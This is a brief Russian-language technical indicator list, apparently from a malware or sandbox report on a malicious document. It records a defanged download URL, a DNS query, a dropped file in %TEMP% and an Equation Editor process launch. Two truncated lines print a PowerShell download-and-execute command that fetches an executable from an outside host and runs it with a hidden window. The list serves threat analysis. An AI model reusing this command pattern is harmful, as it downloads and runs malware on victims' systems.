Техническая информация
- http://go##andi.us/pp.exe как $dskq
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$dSKq=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/pp.exe', $dSKq);(New-Object -com Shell.Application).ShellExecute( $dSKq);}cat...
- %TEMP%\name.exe
- http://go##andi.us/pp.exe
- DNS ASK go##andi.us
- '%TEMP%\name.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$dSKq=$env:temp+'\Name.exe'; (New-Object System.Net.WebClient).DownloadFile( 'http://go##andi.us/pp.exe', $dSKq);(New-Object -com Shell.Application).ShellExecute( $dSKq);}cat...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding